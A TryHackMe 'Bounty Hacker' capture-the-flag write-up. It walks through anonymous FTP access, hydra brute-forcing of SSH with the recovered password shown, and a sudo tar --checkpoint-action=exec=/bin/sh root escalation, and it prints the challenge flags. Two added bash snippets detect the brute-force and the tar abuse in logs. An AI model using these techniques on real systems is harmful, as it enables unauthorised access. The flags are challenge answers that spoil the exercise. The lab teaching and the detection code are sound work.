Bounty Hacker

TryHackMe

You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!

Preparation

First of all, I added the IP address to my /etc/hosts file to create a virtual domain. This lets me perform the enumeration steps without needing to remember every single number in it.

$ echo "10.10.1.216 bountyhacker.test" | sudo tee -a /etc/hosts

Enumeration

I used rustscan from now on because nmap somehow kept throwing a segmentation fault. Running the command, I found 3 open ports: 21, 22 and 80.

$ rustscan -a bountyhacker.test --ulimit 5000 | tee rustscan.log
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/ql/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.194.35:22
Open 10.10.194.35:21
Open 10.10.194.35:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-02 13:54 WIB
Initiating Ping Scan at 13:54
Scanning 10.10.194.35 [2 ports]
Completed Ping Scan at 13:54, 3.00s elapsed (1 total hosts)
Nmap scan report for 10.10.194.35 [host down, received no-response]
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.07 seconds

I tried to log in to the FTP service using anonymous credentials, and it worked.

$ ftp bountyhacker.test
Connected to bountyhacker.test
220 (vsFTPd 3.0.3)
Name (bountyhacker.test:ql): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

I listed the directory in the hope of finding useful files inside it, and yes, there were indeed useful files for me to use.

ftp> ls
229 Entering Extended Passive Mode (|||9699|)
ftp: Can't connect to `10.10.194.35:9699': Connection timed out
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
226 Directory send OK.

I downloaded those two files to my local machine by using get

ftp> get locks.txt
ftp> get task.txt

Looking at task.txt, I found a note and the name of the person who created the task.

$ cat task.txt
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin

Looking at locks.txt, it looks like some sort of password list.

$ cat locks.txt

Using the locks.txt file, I used hydra to brute-force lin's ssh to obtain the password

$ hydra -I -l lin -P locks.txt ssh://bountyhacker.test | tee hydra.log
...
[22][ssh] host: bountyhacker.test   login: lin   password: RedDr4gonSynd1cat3
...
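
From the defender's side, the hydra run above appears in the target's auth log as a burst of failed passwords followed by one accepted login. The following is an added example, not part of the original write-up: it reports such logins from sshd log lines. The function names, log lines, source addresses and the threshold of 5 are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: report SSH password logins that succeed after repeated
# failures for the same account from the same source address.

# Constructed sample in OpenSSH auth.log format; addresses are documentation ranges.
sample_auth_log() {
cat <<'EOF'
Oct  2 14:01:01 bountyhacker sshd[1201]: Failed password for lin from 192.0.2.10 port 40100 ssh2
Oct  2 14:01:01 bountyhacker sshd[1202]: Failed password for lin from 192.0.2.10 port 40102 ssh2
Oct  2 14:01:02 bountyhacker sshd[1203]: Failed password for invalid user admin from 192.0.2.10 port 40104 ssh2
Oct  2 14:01:02 bountyhacker sshd[1204]: Failed password for lin from 192.0.2.10 port 40106 ssh2
Oct  2 14:01:03 bountyhacker sshd[1205]: Failed password for lin from 192.0.2.10 port 40108 ssh2
Oct  2 14:01:03 bountyhacker sshd[1206]: Failed password for lin from 192.0.2.10 port 40110 ssh2
Oct  2 14:01:05 bountyhacker sshd[1207]: Accepted password for lin from 192.0.2.10 port 40112 ssh2
Oct  2 15:20:10 bountyhacker sshd[1300]: Failed password for lin from 198.51.100.7 port 51000 ssh2
Oct  2 15:20:18 bountyhacker sshd[1301]: Accepted password for lin from 198.51.100.7 port 51002 ssh2
EOF
}

# Reads sshd log lines on stdin and prints "user source-ip failures" for every
# accepted password that followed at least $1 failures (default 5) for the
# same user from the same address.
flag_guessed_logins() {
    awk -v min="${1:-5}" '
        / sshd\[[0-9]+\]: Failed password for / {
            # "... for [invalid user] NAME from IP port N ssh2"
            user = $(NF - 5); ip = $(NF - 3)
            fails[user SUBSEP ip]++
            next
        }
        / sshd\[[0-9]+\]: Accepted password for / {
            user = $(NF - 5); ip = $(NF - 3)
            key = user SUBSEP ip
            if (fails[key] >= min)
                printf "%s %s %d\n", user, ip, fails[key]
            fails[key] = 0      # start counting again after a success
        }'
}

sample_auth_log | flag_guessed_logins 5
```

The single mistyped password from 198.51.100.7 stays below the threshold and is not reported.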

Gaining The Shell

Using lin's credential, I gained access to the shell

$ ssh lin@bountyhacker.test
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation:  https://help.ubuntu.com
* Management:     https://landscape.canonical.com
* Support:        https://ubuntu.com/advantage
83 packages can be updated.
0 updates are security updates.
Last login: Sun Jun  7 22:23:41 2020 from 192.168.0.14
lin@bountyhacker:~/Desktop$

Capturing User Flag

This part is the easiest, since the file is in the same directory as lin. I only needed to run this command:

lin@bountyhacker:~$ cat user.txt
THM{CR1M3_SyNd1C4T3}

Elevating The Privilege

I checked lin's sudo privileges and found that she can run the /bin/tar executable as root.

lin@bountyhacker:~/Desktop$ sudo -l
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lin may run the following commands on bountyhacker:
    (root) /bin/tar

After a little bit of googling, I figured out a way to escalate the privilege.

lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# whoami
root
#
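
An added example, not part of the original write-up, showing how a defender could audit for the unrestricted tar grant seen in the sudo -l output and spot the escalation command in sudo's log. The function names, the second grant, the backup user and the timestamps are constructed, and the log layout assumes sudo's default syslog format.

```bash
#!/usr/bin/env bash
# Added example. Sample data is constructed, except the "(root) /bin/tar"
# grant and lin's tar command line, which are the ones shown on this page.

sample_sudo_l() {
cat <<'EOF'
User lin may run the following commands on bountyhacker:
    (root) /bin/tar
    (root) NOPASSWD: /bin/tar -czf /var/backups/home.tgz /home
EOF
}

sample_sudo_log() {
cat <<'EOF'
Oct  2 14:03:40 bountyhacker sudo:   backup : TTY=pts/1 ; PWD=/home/backup ; USER=root ; COMMAND=/bin/tar -czf /var/backups/home.tgz /home
Oct  2 14:05:12 bountyhacker sudo:      lin : TTY=pts/0 ; PWD=/home/lin/Desktop ; USER=root ; COMMAND=/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
EOF
}

# Audit: read `sudo -l` output and print grants that allow tar with no
# argument restriction. Assumes one command per grant line, as above.
audit_tar_grant() {
    awk '
        /^[ \t]*\(/ {
            line = $0
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "", line)     # drop the "(runas)" part
            while (sub(/^[A-Z_]+:[ \t]*/, "", line)) ;  # drop tags such as NOPASSWD:
            if (line ~ /^\/([^ \t]*\/)?tar$/) print line
        }'
}

# Detection: read sudo log lines and print the invoking user of every tar run
# as root that passes --checkpoint-action=exec, spelled as in the command above.
flag_tar_exec() {
    awk '
        / sudo: / && /USER=root/ && /COMMAND=[^ ]*\/tar / && /--checkpoint-action[= ]exec=/ {
            for (i = 1; i < NF; i++) if ($i == "sudo:") { print $(i + 1); break }
        }'
}

sample_sudo_l   | audit_tar_grant
sample_sudo_log | flag_tar_exec
```

The audit reports only the bare /bin/tar grant; the grant with a fixed argument list and the routine backup run are not reported.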

Capturing Root Flag

And just like that, I got full control of the machine

# cat /root/root.txt
THM{80UN7Y_h4cK3r}

That's it, my mission on bountyhacker is done. Thanks for reading and if you were following along, well done!

Copyright 7U124 © 2025